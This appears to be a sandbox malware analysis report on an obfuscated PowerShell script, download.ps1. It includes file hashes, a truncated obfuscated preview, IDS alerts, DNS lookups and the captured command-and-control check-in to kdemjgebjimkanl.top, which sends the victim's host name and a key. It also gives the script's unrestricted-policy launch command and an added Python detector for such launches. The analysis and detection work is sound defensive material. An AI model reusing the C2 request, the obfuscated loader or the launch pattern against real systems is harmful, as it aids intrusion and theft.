• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 4280 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      • VT rate limit hit for: download.ps1
Time | Type | Description
13:15:00 | API Interceptor | 43x Sleep call for process: powershell.exe modified
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):64
                                                                                                      Entropy (8bit):1.1510207563435464
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:NlllulRjFllp:NllU
                                                                                                      MD5:7B390667B7AD392C3A7ECD95310E0D68
                                                                                                      SHA1:F7ED92E360DACA5B2BB3152AFB8A26DD5A408706
                                                                                                      SHA-256:E233F71BD3E7F3B34DC94F8F9DDB533F59E07BE7AEFA021541DF0160436E1C0D
                                                                                                      SHA-512:0131C5BD611E47AF843A354F9AD83CAE0AA4A64B0FB723BB485B9FBDBF409A98BB5248336BCDE84FF72E3EB44D2EC10C30133767CD0DE32C77757C0EE75DCCC2
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview:@...e.................................@. ............@..........
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6221
                                                                                                      Entropy (8bit):3.737844929496551
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:1avs33CxH02kvhkvCCtE0B1fFH/0B1fgHD:1akyUi3BIBc
                                                                                                      MD5:200917FECBAD7C5DB3D394EF2247AC61
                                                                                                      SHA1:6E5398BB25D7447B62EFAD48DC53308E889F8A4B
                                                                                                      SHA-256:76AA1CE4E3407EAF1A1C1073B1E8C82C18369912552768903FDC0E4FFC2AC6E6
                                                                                                      SHA-512:86BAF3D5AF8A9060AF405DCC405B50B45A6586C8DB7D477BE948D176732364C7E6466D133F7B7DA1A9EAFF94E1E078BDE2C9DB44069382DE9E6C57636CC42BC2
                                                                                                      Malicious:false
                                                                                                      Preview:...................................FL..................F.".. ...-/.v.....f...Z..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....l3...Z..ZR...Z......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y............................%..A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......CW.^.Y...............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.....Q...........
                                                                                                      File type:ASCII text, with very long lines (10831), with CRLF line terminators
                                                                                                      Entropy (8bit):5.967110225025242
                                                                                                      TrID:
                                                                                                        File name:download.ps1
                                                                                                        File size:20'393 bytes
                                                                                                        MD5:237f43b9f810e6c6a16c22f7b13d3432
                                                                                                        SHA1:819211cf07c4070f99e7cad5905a1e3f4865628e
                                                                                                        SHA256:f0b02355a54d79467e35c12fe9b31d8f69f0bca52aef5fcf684d9b160ba561f0
                                                                                                        SHA512:0cb243cffd7076ce72e540d87b223d1e99f212cd277c82b936b772952759d954645d772dfea35d510170c4ae10b084628f4ed6be71afa981a376bee5a1ed47e0
                                                                                                        SSDEEP:384:Rzz93+7Mrc65BhyKQLCWl4nFcZJHyJojMnj25ZGHy61hKXRKobnlNh8FTXRpzft2:v3vo6Vy46SSHyK5ZzGh4RKorlNqFThP2
                                                                                                        TLSH:92926CA7738CDDF282D996AF5213EC043BA9A42FC5ABAEC4FB4982C133916015E4DC50
                                                                                                        File Content Preview:$vizlamghu=$executioncontext;$inonisesisalreesortionreisisinbeis = (-joIN (@((-7838+7891),(-6906+(-2195+(17502-(1174+(-415+(8235150/1085)))))),(245955/(-3778+8093)),(9419-(16751772/1788)),(428232/7647),(7520-(14488-7022)),(-7741+(16002-8205)),(-8968+9023)
                                                                                                        Icon Hash:3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-30T19:15:04.888420+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 1 | 192.168.2.4 | 49730 | 45.61.136.138 | 80 | TCP
2024-12-30T19:15:04.888420+0100 | 2057741 | ET MALWARE TA582 CnC Checkin | 1 | 192.168.2.4 | 49730 | 45.61.136.138 | 80 | TCP
2024-12-30T19:15:05.867335+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 1 | 192.168.2.4 | 49731 | 142.250.185.132 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 30, 2024 19:15:04.230721951 CET | 49730 | 80 | 192.168.2.4 | 45.61.136.138
Dec 30, 2024 19:15:04.235532999 CET | 80 | 49730 | 45.61.136.138 | 192.168.2.4
Dec 30, 2024 19:15:04.235605001 CET | 49730 | 80 | 192.168.2.4 | 45.61.136.138
Dec 30, 2024 19:15:04.239268064 CET | 49730 | 80 | 192.168.2.4 | 45.61.136.138
Dec 30, 2024 19:15:04.244060040 CET | 80 | 49730 | 45.61.136.138 | 192.168.2.4
Dec 30, 2024 19:15:04.841994047 CET | 80 | 49730 | 45.61.136.138 | 192.168.2.4
Dec 30, 2024 19:15:04.852571011 CET | 49731 | 80 | 192.168.2.4 | 142.250.185.132
Dec 30, 2024 19:15:04.857378006 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:04.857588053 CET | 49731 | 80 | 192.168.2.4 | 142.250.185.132
Dec 30, 2024 19:15:04.857588053 CET | 49731 | 80 | 192.168.2.4 | 142.250.185.132
Dec 30, 2024 19:15:04.862401962 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:04.888420105 CET | 49730 | 80 | 192.168.2.4 | 45.61.136.138
Dec 30, 2024 19:15:05.867115021 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.867273092 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.867285967 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.867297888 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.867309093 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.867321968 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.867328882 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.867336035 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.867335081 CET | 49731 | 80 | 192.168.2.4 | 142.250.185.132
Dec 30, 2024 19:15:05.867350101 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.867362976 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.867396116 CET | 49731 | 80 | 192.168.2.4 | 142.250.185.132
Dec 30, 2024 19:15:05.867436886 CET | 49731 | 80 | 192.168.2.4 | 142.250.185.132
Dec 30, 2024 19:15:05.872227907 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.872253895 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.872297049 CET | 49731 | 80 | 192.168.2.4 | 142.250.185.132
Dec 30, 2024 19:15:05.955179930 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.955193043 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.955204010 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.955310106 CET | 49731 | 80 | 192.168.2.4 | 142.250.185.132
Dec 30, 2024 19:15:05.959022045 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.959033012 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.959044933 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.959161997 CET | 49731 | 80 | 192.168.2.4 | 142.250.185.132
Dec 30, 2024 19:15:05.959162951 CET | 49731 | 80 | 192.168.2.4 | 142.250.185.132
Dec 30, 2024 19:15:05.971822023 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.971832037 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
Dec 30, 2024 19:15:05.971988916 CET | 49731 | 80 | 192.168.2.4 | 142.250.185.132
Dec 30, 2024 19:15:05.971992016 CET | 80 | 49731 | 142.250.185.132 | 192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.972003937 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.972037077 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:05.984819889 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.984833002 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.984843969 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.984904051 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:05.992614985 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.992626905 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.992640972 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.992676973 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:05.992712021 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.000130892 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.000149965 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.000214100 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.000261068 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.000281096 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.000318050 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.008028030 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.008039951 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.008049965 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.008085012 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.015646935 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.015656948 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.015727997 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.015749931 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.015789032 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.015794992 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.023520947 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.023533106 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.023570061 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.023619890 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.023629904 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.023680925 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.031173944 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.031205893 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.031220913 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.031260014 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.031270981 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.031297922 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.043701887 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.043714046 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.043751001 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.043813944 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.043817043 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.043962002 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.046658039 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.046677113 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.046727896 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.046833038 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.046875000 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.046890974 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.054425955 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.054440975 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.054507971 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.054514885 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.054517984 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.054568052 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.062181950 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.062205076 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.062215090 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.062251091 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.062272072 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.069928885 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.069957972 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.069967985 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.070040941 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.081120014 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.081228971 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.337491989 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.337708950 CET4973080192.168.2.445.61.136.138
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 30, 2024 19:15:03.824774027 CET | 58076 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 19:15:04.218657970 CET | 53 | 58076 | 1.1.1.1 | 192.168.2.4
Dec 30, 2024 19:15:04.843369007 CET | 60038 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 19:15:04.850259066 CET | 53 | 60038 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 30, 2024 19:15:03.824774027 CET | 192.168.2.4 | 1.1.1.1 | 0x1c7e | Standard query (0) | kdemjgebjimkanl.top | A (IP address) | IN (0x0001) | false
Dec 30, 2024 19:15:04.843369007 CET | 192.168.2.4 | 1.1.1.1 | 0x66fc | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 19:15:04.218657970 CET | 1.1.1.1 | 192.168.2.4 | 0x1c7e | No error (0) | kdemjgebjimkanl.top | | 45.61.136.138 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 19:15:04.850259066 CET | 1.1.1.1 | 192.168.2.4 | 0x66fc | No error (0) | www.google.com | | 142.250.185.132 | A (IP address) | IN (0x0001) | false
                                                                                                        • kdemjgebjimkanl.top
                                                                                                        • www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 45.61.136.138 | 80 | 4280 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 19:15:04.239268064 CET | 215 | OUT | GET /67wr8lha3ohtr.php?id=user-PC&key=72208797663&s=527 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: kdemjgebjimkanl.top
Connection: Keep-Alive
Dec 30, 2024 19:15:04.841994047 CET | 166 | IN | HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 30 Dec 2024 18:15:04 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.google.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 142.250.185.132 | 80 | 4280 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 19:15:04.857588053 CET | 159 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: www.google.com
Connection: Keep-Alive
Dec 30, 2024 19:15:05.867115021 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 18:15:05 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-qI2LndbGo3Ewp3Gr5w0Mtw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-VJ-mrL_8JZtE1LV43yqkyAgGYfuLWq3zoJBqsQPB_48i8JtlcScVM; expires=Sat, 28-Jun-2025 18:15:05 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=520=edUyilLz9NohtKdJgWF7ALA3qLVmu0O0k_puHJrkEuRaEYtXcUopEPe90jpO009cj4MblYOZQGmesoAZ_978npSBG9HajeRlbBrlLG6VjHt_GX3vCGreE64fg-4MZu7kLrJmS0CQerN4O6LF9ZcvhFP2lkrN1Yr9eEeVPfSZIJCFhcYN6y3nRjN9Z9FoNV8jngeTHzV7; expires=Tue, 01-Jul-2025 18:15:05 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked

Target ID: 0
Start time: 13:14:57
Start date: 30/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 13:14:57
Start date: 30/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true
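The command line recorded for Target ID 0 carries the two details a detection engineer would key on: the execution policy is lowered to `unrestricted` on the command line itself (so no machine or user policy is consulted), and the script is launched from a user-writable path under C:\Users. The following is an added example, not part of the Joe Sandbox report or of the analysed sample, that parses process entries in the same "Key:value" layout as the table above and flags those two conditions. The abbreviation handling for powershell.exe switches (-ep, -ex, -exec, -f, -w) and the list of user-writable directory names are assumptions; Target ID 2 is an invented benign baseline so the checks have something to leave alone.

```python
import shlex
from pathlib import PureWindowsPath

# Constructed sample in the same "Key:value" layout as the process entries above.
# Targets 0 and 1 reproduce the report's two command lines; Target 2 is an invented
# benign baseline (hypothetical vendor script) that the checks should not flag.
SAMPLE_ENTRIES = """\
Target ID:0
Path:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Commandline:"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\\Users\\user\\Desktop\\download.ps1"

Target ID:1
Path:C:\\Windows\\System32\\conhost.exe
Commandline:C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1

Target ID:2
Path:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Commandline:"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -NoProfile -File "C:\\Program Files\\Vendor\\maint.ps1"
"""

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
INSECURE_POLICIES = {"unrestricted", "bypass"}
# Assumed set of directory names that an unprivileged user can normally write to.
USER_WRITABLE_DIRS = {"users", "temp", "tmp", "appdata", "programdata", "public"}


def parse_entries(text):
    """Split blank-line separated entries into dicts keyed by field name.
    Only the first ':' separates key from value, so drive letters survive."""
    entries = []
    for block in text.strip().split("\n\n"):
        entry = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")
            entry[key.strip()] = value.strip()
        entries.append(entry)
    return entries


def tokenize(cmdline):
    """Windows-style split: backslashes are literal and quoted paths stay whole."""
    return [tok.strip('"') for tok in shlex.split(cmdline, posix=False)]


def switch_matches(tok, name, min_len=2):
    """powershell.exe accepts unambiguous prefixes of its parameter names
    (-ExecutionPolicy, -Exec, -Ex; -File, -F; -WindowStyle, -W). -ep is accepted
    too and is special-cased. min_len=2 keeps '-e' (EncodedCommand) from matching
    ExecutionPolicy; treating these prefixes as sufficient is an assumption."""
    if not tok.startswith(("-", "/")):
        return False
    t = tok.lstrip("-/").lower()
    if name == "executionpolicy" and t == "ep":
        return True
    return len(t) >= min_len and name.startswith(t)


def analyze(entry):
    """Return findings for one process entry; an empty list means nothing flagged."""
    findings = []
    tokens = tokenize(entry.get("Commandline", ""))
    if not tokens or PureWindowsPath(tokens[0]).name.lower() not in POWERSHELL_IMAGES:
        return findings
    for i in range(1, len(tokens)):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if switch_matches(tok, "executionpolicy") and nxt.lower() in INSECURE_POLICIES:
            findings.append(f"execution policy lowered to '{nxt.lower()}' on the command line")
        elif switch_matches(tok, "windowstyle", min_len=1) and nxt.lower() == "hidden":
            findings.append("window hidden from the user")
        elif switch_matches(tok, "file", min_len=1) and nxt:
            # parts[0] is the drive root; compare the directory names after it.
            parts = [p.lower() for p in PureWindowsPath(nxt).parts[1:]]
            if any(p in USER_WRITABLE_DIRS for p in parts):
                findings.append(f"script '{nxt}' launched from a user-writable location")
    return findings


def scan(text):
    """Map each Target ID to its findings so a caller can triage the whole tree."""
    return {e.get("Target ID", "?"): analyze(e) for e in parse_entries(text)}


if __name__ == "__main__":
    for target, hits in scan(SAMPLE_ENTRIES).items():
        print(f"Target ID {target}: {hits or 'no findings'}")
```

Run against the constructed entries, Target ID 0 yields two findings (the lowered policy and the C:\Users script path), while conhost.exe is skipped as a non-PowerShell image and the baseline entry in Target ID 2 comes back clean. In a real pipeline the same `analyze` function would be fed Sysmon Event ID 1 or Security 4688 command lines instead of report text.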

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4bfdb05308c08d3bfc288b46e0f021fede1d5685c208f1d4b5073e6b1ad43726
                                                                                                          • Instruction ID: f3ed4b759875405c329ff830a7b5490eeca4dbbe6410df64555fcbda0d682e2b
                                                                                                          • Opcode Fuzzy Hash: 4bfdb05308c08d3bfc288b46e0f021fede1d5685c208f1d4b5073e6b1ad43726
                                                                                                          • Instruction Fuzzy Hash: 43F19230A09A4E8FEBA8EF28C8557F937D1FF54310F14426EE85DC7295CB74A9458B82
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c6ab04dbc1d60719540281645d01f7d4e6c0a5c67bbf5c2430c9272273e5e580
                                                                                                          • Instruction ID: 04d0d06345641fa7968ff77f012a692b2b48e8f9968b4e16fb7f1c78feaf1ee3
                                                                                                          • Opcode Fuzzy Hash: c6ab04dbc1d60719540281645d01f7d4e6c0a5c67bbf5c2430c9272273e5e580
                                                                                                          • Instruction Fuzzy Hash: 37E1B330A09A4E8FEBA8EF28C8557F977D1FF54310F14426AE84DC72A5CF74A9458B81
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1802258265.00007FFD9BD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bd20000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 7e:$ 7e:$(7e:
                                                                                                          • API String ID: 0-2242143580
                                                                                                          • Opcode ID: 8961ba90dfd8fd9c07f068b809347af9405fd221418760ade141c26e01f49a3f
                                                                                                          • Instruction ID: 8ee98fe2b40805b5a8f5eab32b61aa9a8a58a5f5f8c664a69ad0a5114d8bef0a
                                                                                                          • Opcode Fuzzy Hash: 8961ba90dfd8fd9c07f068b809347af9405fd221418760ade141c26e01f49a3f
                                                                                                          • Instruction Fuzzy Hash: FA322832B0EACA0FE7AE976848659B47BD1EF96214B0911FFD44EC71E3DD19AC068341
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b2cbf2f829555313f5ca119b79540fa6134ecc6cced28fcbdef589c3c6dadafa
